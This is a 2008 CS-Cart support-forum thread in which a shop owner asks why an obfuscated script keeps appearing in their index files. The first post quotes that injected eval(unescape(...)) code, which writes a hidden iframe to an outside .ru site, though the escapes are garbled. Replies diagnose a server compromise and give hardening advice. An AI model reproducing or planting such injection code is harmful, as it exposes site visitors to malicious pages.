Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

hacked script insert file index.html and index.php Rate Topic   - - - - -

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 24 January 2008 - 09:43 PM #1

I have set permission folder and file with thist thread:
http://forum.cs-cart...read.php?t=4549

i have Linux – Running PHP as an Apache module

I can not understand why the main index.php file, the file index.php present in the target core, I find the following sript inserted in the code:

<! - Or --><!-- -> <script> eval (unescape ( "% 77% 69% 64% 6th% 6f% 2nd% 77% 73% 74% 61% 74% 75% 73 % 3d% 27% 44% 6f% 6th% 65% 27% 3b% 6f% 64% 63% 75% 65% 6d% 6th% 2nd% 74% 77% 72% 69% 74% 65% 28% 27% 3c % 69% 66% 72% 61% 6d% 65% 20% 61% 6th% 6d% 3d% 65% 66% 39% 20% 73% 72% 63% 3d% 5c% 27% 68% 74% 74% 70 % 3a% 2f% 2f% 74% 72% 61% 66% 66% 75% 72% 6c% 2nd% 72% 75% 73% 2f% 6c% 69% 76% 27% 3f% 2b% 4d% 61% 74 2nd% 68% 72%% 6f% 75% 64% 6th% 4d% 28% 61% 74% 68% 2nd% 72% 61% 64% 6th% 6f% 6d% 28% 29% 2nd% 38% 37% 37 % 32% 33% 29% 2b% 27% 63% 63% 38% 64% 64% 32% 33% 36% 32% 65% 5c% 27% 20% 77% 69% 64% 74% 68% 32% 3d % 34% 33% 20% 68% 65% 69% 67% 68% 74% 3d% 33% 36% 31% 20% 73% 74% 79% 65% 6c% 3d% 5c% 27% 64% 69% 73 6c% 70% 79% 61% 20%% 3a% 6th% 6f% 6th% 5c% 65% 27% 3rd% 3c% 2f% 69% 66% 72% 61% 65% 6d% 3rd% 27% 29 ") ) </ script>
------------------
Simone
Rome - Italy
Sorry for my horrible English ;)

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 24 January 2008 - 09:46 PM #2

What is the full path of the index.php? You dont really say what folder this file is located?
Pimpin' skins since v1.0

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 24 January 2008 - 11:31 PM #3

What is the full path of the index.php? You dont really say what folder this file is located?


Thanks for your answer.
I know where they are, I do not know why this script is inserted despite set permissions to the folders.
I refer also to several other index.php file folders store (core, target, includes, payments, var ...)
The file index.php main store is in the root of the site.
------------------
Simone
Rome - Italy
Sorry for my horrible English ;)

 
  • The Tool
  • Been Here Way Too Long Member
  • Members
  • Join Date: 30-Mar 07
  • 3732 posts

Posted 25 January 2008 - 06:43 AM #4

Could have just been a corrupt file.? I am no coder but it doesn't look like it does anything.

Just fix it and if it happens again, then I would worry.

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 25 January 2008 - 11:56 AM #5

Your web server has been compromised vega. Bring this issue up to your host and advise them to scan other user accounts on that machine for the same problem as well within index files. This appears to be another variation of the malicious <iframe> insertion hack that was popular awhile back. This is usually caused by weaknesses in the servers security that a hacker has found a way to insert shell commands or gain full shell access with ‘at least’ Apache ownership/permissions.

My advice to you is to remove all occurrences of this script in all files and carefully inspect all other files on your account for other code changes or additional files which may have been added. Also change your control panel/ftp passwords asap but this won’t help you much if the server itself has been compromised.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 27 January 2008 - 05:19 PM #6

There is a new much worse variation of that <iframe> insertion hack going around right now vega as I expected above.

I am not positive this is the exact exploit affecting your site but do know that it is at least a variation of it. You should definitely ask your host to investigate your server asap because it can be very dangerous to your visitors and customers.

http://blog.cpanel.net/?p=31
http://www.cpanel.ne...js_toolkit.html
http://www.finjan.co...sLan=1819&lan=3

http://www.google.co...ndom_js_toolkit

I will note that this is not related to cs-cart security or permissions within your account. This is a kernel level server exploit that affects every site hosted on the infected machine.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 05 February 2008 - 11:17 PM #7

There is a new much worse variation of that <iframe> insertion hack going around right now vega as I expected above.

I am not positive this is the exact exploit affecting your site but do know that it is at least a variation of it. You should definitely ask your host to investigate your server asap because it can be very dangerous to your visitors and customers.

http://blog.cpanel.net/?p=31
http://www.cpanel.ne...js_toolkit.html
http://www.finjan.co...sLan=1819&lan=3

http://www.google.co...ndom_js_toolkit

I will note that this is not related to cs-cart security or permissions within your account. This is a kernel level server exploit that affects every site hosted on the infected machine.



I contacted my host and is not any intrusion
------------------
Simone
Rome - Italy
Sorry for my horrible English ;)

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 06 February 2008 - 12:03 AM #8

They may be telling you that it wasn't an intrusion but it's not truthful.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]

 
  • TonyK
  • Member
  • Members
  • Join Date: 03-Mar 06
  • 1686 posts

Posted 06 February 2008 - 01:46 PM #9

Must be the script fairy came by and left you a present.

Were you a good boy?:twisted:

Time to switch hosts.
Pimpin' skins since v1.0

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 10 February 2008 - 07:14 PM #10

They may be telling you that it wasn't an intrusion but it's not truthful.


This what I think myself. They damage the reputation.
For the moment I changed the password of my server. At this point I would be useful to know what are the exact permits that have set.
------------------
Simone
Rome - Italy
Sorry for my horrible English ;)

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 10 February 2008 - 07:17 PM #11

Must be the script fairy came by and left you a present.

Were you a good boy?:twisted:

Time to switch hosts.




They may have found my login. Think this is possible or that it is easier to have a hole in my host?

I read messages in various different views on what permissions set and I did not understand what are the most correct safety.
My host is UNIX
------------------
Simone
Rome - Italy
Sorry for my horrible English ;)

 
  • ThomH
  • Senior Member
  • Members
  • Join Date: 20-Nov 07
  • 1548 posts

Posted 11 February 2008 - 05:02 AM #12

You can find an online decoder here.

WebGraphiq offers a wide range of professionally developed, ready to use CS-Cart add-ons to provide additional functionality and boost your sales. The oldest active CS-Cart add-on development team. -- Since 2006 --


CS-CART ADD-ONS | FREE QUOTE | CS-CART DEVELOPMENT | @webgraphiq


 
  • Earl
  • Member
  • Members
  • Join Date: 30-Oct 07
  • 44 posts

Posted 18 February 2008 - 09:21 PM #13

You want to take a look at this article 10 Steps to Securing your Server.
http://www.webhostgear.com/314.html

You may want to install a firewall with ingress and egress filtering such as AFP or CSF firewall (if you have cpanel), block all unused ports and stop used services if you don't have one already; Also install a rootkit detector such as CHKROOTKIT. If possible change the SSH port to a non standard port.

Maybe you have done these already or not, but it just in case. Oh and some bad news it maybe a good to have your host re-install the server OS and if possible you should restore your site from a good backup.
Earl
Cs-Cart 1.3.5 sp2 | Linux VPS Hosting | MySql 5.0.27 | PHP 5.2.6

 
  • vega
  • Member
  • Members
  • Join Date: 14-Dec 07
  • 57 posts

Posted 13 March 2008 - 11:08 PM #14

Sorry if you answer today.
With regard to my problem I contacted my hosting is the response was very professional "we can not control all of the pages of our clients"
However, I changed the information access and the problem seems solved.
I remember that he came to support your login shortly after he bought cs cart. We are confident that these data have been carefully preserved? .. I hope to you.
Thanks to all
------------------
Simone
Rome - Italy
Sorry for my horrible English ;)

 
  • VGC
  • Member
  • Members
  • Join Date: 17-Jul 08
  • 33 posts

Posted 17 July 2008 - 08:21 PM #15

I am new to php since I'm a Java guy and in 10 years of Java development no hackers ever cracked our servers. I'm surprised this is happening to the php world, but then again, Java is difficult to understand:-) I've taken all the steps that S-Combs described in our threads, so I hope it doesn't happen to me.

VGC